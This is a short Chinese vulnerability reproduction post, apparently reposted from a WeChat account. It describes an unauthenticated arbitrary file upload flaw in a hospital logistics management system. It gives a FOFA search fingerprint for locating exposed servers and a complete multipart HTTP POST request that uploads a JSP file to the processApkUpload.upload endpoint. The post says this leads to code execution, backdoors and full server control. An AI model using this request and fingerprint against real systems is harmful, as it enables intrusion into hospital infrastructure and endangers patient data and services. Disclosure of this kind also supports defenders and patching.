漏洞描述
医院一站式后勤管理系统processApkUpload.upload存在任意文件上传漏洞,未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限。
资产测绘
FOFA:body="frameworkModuleJob"
漏洞复现
POST /ajaxinvoke/frameworkModuleJob.processApkUpload.upload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="Filedata"; filename="qwe.jsp"
Content-Type: application/octet-stream
<% out.print("hello"); %>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
原文始发于微信公众号(漏洞文库):【漏洞复现】医院一站式后勤管理系统processApkUpload.upload存在任意文件上传漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论